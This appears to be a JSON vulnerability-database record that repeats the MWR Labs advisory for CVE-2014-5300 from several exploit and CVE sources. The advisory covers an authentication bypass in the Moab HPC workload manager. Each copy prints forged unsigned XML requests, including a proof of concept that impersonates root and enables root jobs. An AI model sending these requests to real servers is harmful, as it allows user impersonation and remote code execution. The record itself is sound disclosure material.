{"type": "seebug", "viewCount": 6, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5300"]}, {"type": "exploitdb", "idList": ["EDB-ID:34865"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:01F58CE6789F709DEAD45CDB65529908"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128483"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31196", "SECURITYVULNS:VULN:14008"]}, {"type": "zdt", "idList": ["1337DAY-ID-22709"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-5300"]}, {"type": "exploitdb", "idList": ["EDB-ID:34865"]}, {"type": "zdt", "idList": ["1337DAY-ID-22709"]}]}, "exploitation": null, "vulnersScore": -0.1}, "reporter": "Root", "title": "Moab < 7.2.9 - Authorization Bypass", "cvelist": ["CVE-2014-5300"], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87295", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "references": [], "enchantments_done": [], "modified": "2014-10-10T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-87295", "id": "SSV:87295", "status": "poc", "lastseen": "2017-11-19T13:11:52", "sourceData": "\n ##[Moab Authentication Bypass : CVE-2014-5300]##\r\n \r\nSoftware: Moab\r\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\r\nCVE Reference: CVE-2014-5300\r\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\r\n \r\n \r\n##[Description]\r\n \r\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\r\n \r\n \r\n##[Impact]\r\n \r\nSuccessful exploitation could lead to remote code execution.\r\n \r\n \r\n##[Cause]\r\n \r\nThe Moab server does not appropriately authenticate requests.\r\n \r\n \r\n##[Solution]\r\n \r\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\r\n \r\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\r\n \r\n \r\n##[Technical Details]\r\n \r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below:\r\n \r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n \r\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\r\n \r\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\r\n \r\nThe following message contains no signature element and therefore will be accepted by the server:\r\n \r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n \r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n \r\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\r\n \r\n \r\n##[Proof of Concept]\r\n \r\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering):\r\n \r\n00000238\r\n<Envelope component="ClusterScheduler" count="1" name="moab" version="8.0.beta.2"><Body actor="root" timestamp="1404856164"><Request action="modify" actor="root" args="ALLOWROOTJOBS TRUE"><Object>sched</Object></Request></Body></Envelope>\r\n \r\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\r\n \r\n \r\n##[Detailed Timeline]\r\n \r\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\r\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\r\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue \r\n2014-07-14 : Moab 8 released\r\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-16 : Moab 7.2.9 released\r\n2014-09-25 : Public release of advisory \r\n \r\n \r\nhttp://labs.mwrinfosecurity.com\n ", "published": "2014-10-10T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659994789, "score": 1659995174}, "_internal": {"score_hash": "1ff4db432cde9643bc2abaf2e60f93f0"}}
{"zdt": [{"lastseen": "2018-02-21T01:35:33", "description": "Moab versions prior to 7.2.9 and 8 suffer from a dynamic reconfiguration authentication bypass issue that allows for remote code execution.", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "zdt", "title": "Moab Workload Manage 7.2.9 / 8 Dynamic Configuration Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5300"], "modified": "2014-09-30T00:00:00", "id": "1337DAY-ID-22709", "href": "https://0day.today/exploit/description/22709", "sourceData": "##[Moab Authentication Bypass : CVE-2014-5300]##\r\n\r\nSoftware: Moab\r\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\r\nCVE Reference: CVE-2014-5300\r\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\r\n\r\n\r\n##[Description]\r\n\r\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\r\n\r\n\r\n##[Impact]\r\n\r\nSuccessful exploitation could lead to remote code execution.\r\n\r\n\r\n##[Cause]\r\n\r\nThe Moab server does not appropriately authenticate requests.\r\n\r\n\r\n##[Solution]\r\n\r\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\r\n\r\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \r\n\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor=\"test\" timestamp=\"1408488412\">\r\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\r\n\r\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\r\n\r\nThe following message contains no signature element and therefore will be accepted by the server:\r\n\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\r\n <Body actor=\"test\" timestamp=\"1408488412\">\r\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\r\n\r\n\r\n##[Proof of Concept]\r\n\r\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \r\n\r\n00000238\r\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" version=\"8.0.beta.2\"><Body actor=\"root\" timestamp=\"1404856164\"><Request action=\"modify\" actor=\"root\" args=\"ALLOWROOTJOBS TRUE\"><Object>sched</Object></Request></Body></Envelope>\r\n\r\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\r\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\r\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue \r\n2014-07-14 : Moab 8 released\r\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-16 : Moab 7.2.9 released\r\n2014-09-25 : Public release of advisory \r\n\r\n\r\nhttp://labs.mwrinfosecurity.com\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/22709", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:34", "description": "\nMoab 7.2.9 - Authentication Bypass", "edition": 2, "published": "2014-10-02T00:00:00", "title": "Moab 7.2.9 - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5300"], "modified": "2014-10-02T00:00:00", "id": "EXPLOITPACK:01F58CE6789F709DEAD45CDB65529908", "href": "", "sourceData": "##[Moab Authentication Bypass : CVE-2014-5300]##\n\nSoftware: Moab\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\nCVE Reference: CVE-2014-5300\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\nSeverity: High Risk\nVendor: Adaptive Computing\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\n\n\n##[Description]\n\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\n\n\n##[Impact]\n\nSuccessful exploitation could lead to remote code execution.\n\n\n##[Cause]\n\nThe Moab server does not appropriately authenticate requests.\n\n\n##[Solution]\n\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\n\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\n\n\n##[Technical Details]\n\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \n\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\n <Signature>\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\n </Signature>\n <Body actor=\"test\" timestamp=\"1408488412\">\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\n <Object>job</Object>\n <job>\n <Owner>test</Owner>\n <UserId>test</UserId>\n <GroupId>test</GroupId>\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\n <UMask>2</UMask>\n <Executable>/usr/bin/id</Executable>\n <SubmitLanguage>PBS</SubmitLanguage>\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\n </job>\n </Request>\n </Body>\n</Envelope>\n\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\n\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\n\nThe following message contains no signature element and therefore will be accepted by the server:\n\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\">\n <Body actor=\"test\" timestamp=\"1408488412\">\n <Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\">\n <Object>job</Object>\n <job>\n <Owner>test</Owner>\n <UserId>test</UserId>\n <GroupId>test</GroupId>\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\n <UMask>2</UMask>\n\n <Executable>/usr/bin/id</Executable>\n <SubmitLanguage>PBS</SubmitLanguage>\n <SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString>\n </job>\n </Request>\n </Body>\n</Envelope>\n\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\n\n\n##[Proof of Concept]\n\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \n\n00000238\n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" version=\"8.0.beta.2\"><Body actor=\"root\" timestamp=\"1404856164\"><Request action=\"modify\" actor=\"root\" args=\"ALLOWROOTJOBS TRUE\"><Object>sched</Object></Request></Body></Envelope>\n\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\n\n\n##[Detailed Timeline]\n\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue \n2014-07-14 : Moab 8 released\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\n2014-09-08 : Release of advisory to HPC community\n2014-09-16 : Moab 7.2.9 released\n2014-09-25 : Public release of advisory \n\n\nhttp://labs.mwrinfosecurity.com", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:41:04", "description": "Adaptive Computing Moab before 7.2.9 and 8 before 8.0.0 allows remote attackers to bypass the signature check, impersonate arbitrary users, and execute commands via a message without a signature.", "cvss3": {}, "published": "2014-10-08T19:55:00", "type": "cve", "title": "CVE-2014-5300", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5300"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:adaptivecomputing:moab:7.2.8", "cpe:/a:adaptivecomputing:moab:8.0"], "id": "CVE-2014-5300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5300", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adaptivecomputing:moab:7.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:adaptivecomputing:moab:8.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:19:35", "description": "", "published": "2014-09-30T00:00:00", "type": "packetstorm", "title": "Moab Dynamic Configuration Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5300"], "modified": "2014-09-30T00:00:00", "id": "PACKETSTORM:128483", "href": "https://packetstormsecurity.com/files/128483/Moab-Dynamic-Configuration-Authentication-Bypass.html", "sourceData": "`##[Moab Authentication Bypass : CVE-2014-5300]## \n \nSoftware: Moab \nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8 \nCVE Reference: CVE-2014-5300 \nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/) \nSeverity: High Risk \nVendor: Adaptive Computing \nVendor Response: Resolved in Moab 7.2.9 and Moab 8 \n \n \n##[Description] \n \nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8. \n \n \n##[Impact] \n \nSuccessful exploitation could lead to remote code execution. \n \n \n##[Cause] \n \nThe Moab server does not appropriately authenticate requests. \n \n \n##[Solution] \n \nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication. \n \nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue. \n \n \n##[Technical Details] \n \nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \n \n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\"> \n<Signature> \n<DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue> \n<SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue> \n</Signature> \n<Body actor=\"test\" timestamp=\"1408488412\"> \n<Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\"> \n<Object>job</Object> \n<job> \n<Owner>test</Owner> \n<UserId>test</UserId> \n<GroupId>test</GroupId> \n<InitialWorkingDirectory>/home/test</InitialWorkingDirectory> \n<UMask>2</UMask> \n<Executable>/usr/bin/id</Executable> \n<SubmitLanguage>PBS</SubmitLanguage> \n<SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString> \n</job> \n</Request> \n</Body> \n</Envelope> \n \nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected. \n \nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element. \n \nThe following message contains no signature element and therefore will be accepted by the server: \n \n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" type=\"nonblocking\" version=\"8.0.beta.2\"> \n<Body actor=\"test\" timestamp=\"1408488412\"> \n<Request action=\"submit\" actor=\"test\" cmdline=\"\\STARTmsub\"> \n<Object>job</Object> \n<job> \n<Owner>test</Owner> \n<UserId>test</UserId> \n<GroupId>test</GroupId> \n<InitialWorkingDirectory>/home/test</InitialWorkingDirectory> \n<UMask>2</UMask> \n \n<Executable>/usr/bin/id</Executable> \n<SubmitLanguage>PBS</SubmitLanguage> \n<SubmitString>\\START/usr/bin/id\\0a\\0a</SubmitString> \n</job> \n</Request> \n</Body> \n</Envelope> \n \nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users. \n \n \n##[Proof of Concept] \n \nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \n \n00000238 \n<Envelope component=\"ClusterScheduler\" count=\"1\" name=\"moab\" version=\"8.0.beta.2\"><Body actor=\"root\" timestamp=\"1404856164\"><Request action=\"modify\" actor=\"root\" args=\"ALLOWROOTJOBS TRUE\"><Object>sched</Object></Request></Body></Envelope> \n \nSending the entire message above (including the size value) will enable root jobs on a vulnerable server. \n \n \n##[Detailed Timeline] \n \n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive \n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue \n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue \n2014-07-14 : Moab 8 released \n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge \n2014-09-08 : Release of advisory to HPC community \n2014-09-16 : Moab 7.2.9 released \n2014-09-25 : Public release of advisory \n \n \nhttp://labs.mwrinfosecurity.com \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128483/moab-authbypass.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5300"], "description": "\r\n\r\n##[Moab Authentication Bypass : CVE-2014-5300]##\r\n\r\nSoftware: Moab\r\nAffected Versions: All versions prior to Moab 7.2.9 and Moab 8\r\nCVE Reference: CVE-2014-5300\r\nAuthor: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Resolved in Moab 7.2.9 and Moab 8\r\n\r\n\r\n##[Description]\r\n\r\nIt is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.\r\n\r\n\r\n##[Impact]\r\n\r\nSuccessful exploitation could lead to remote code execution.\r\n\r\n\r\n##[Cause]\r\n\r\nThe Moab server does not appropriately authenticate requests.\r\n\r\n\r\n##[Solution]\r\n\r\nUpgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.\r\n\r\nThis issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.\r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: \r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nContained within this message is a <Signature> element, which contains both a <DigestValue> and <SignatureValue> elements. The <DigestValue> is simply a SHA1 sum of the <Body> element. The <SignatureValue>, however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.\r\n\r\nHowever, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a <Signature> element.\r\n\r\nThe following message contains no signature element and therefore will be accepted by the server:\r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n\r\n <Executable>/usr/bin/id</Executable>\r\n <SubmitLanguage>PBS</SubmitLanguage>\r\n <SubmitString>\START/usr/bin/id\0a\0a</SubmitString>\r\n </job>\r\n </Request>\r\n </Body>\r\n</Envelope>\r\n\r\nWith no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.\r\n\r\n\r\n##[Proof of Concept]\r\n\r\nIn addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): \r\n\r\n00000238\r\n<Envelope component="ClusterScheduler" count="1" name="moab" version="8.0.beta.2"><Body actor="root" timestamp="1404856164"><Request action="modify" actor="root" args="ALLOWROOTJOBS TRUE"><Object>sched</Object></Request></Body></Envelope>\r\n\r\nSending the entire message above (including the size value) will enable root jobs on a vulnerable server.\r\n\r\n\r\n##[Detailed Timeline]\r\n\r\n2014-07-08 : Vulnerability identified and detailed information passed to Adaptive\r\n2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue\r\n2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue\t\r\n2014-07-14 : Moab 8 released\r\n2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge\r\n2014-09-08 : Release of advisory to HPC community\r\n2014-09-16 : Moab 7.2.9 released\r\n2014-09-25 : Public release of advisory\t\r\n\r\n\r\nhttp://labs.mwrinfosecurity.com\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31196", "href": 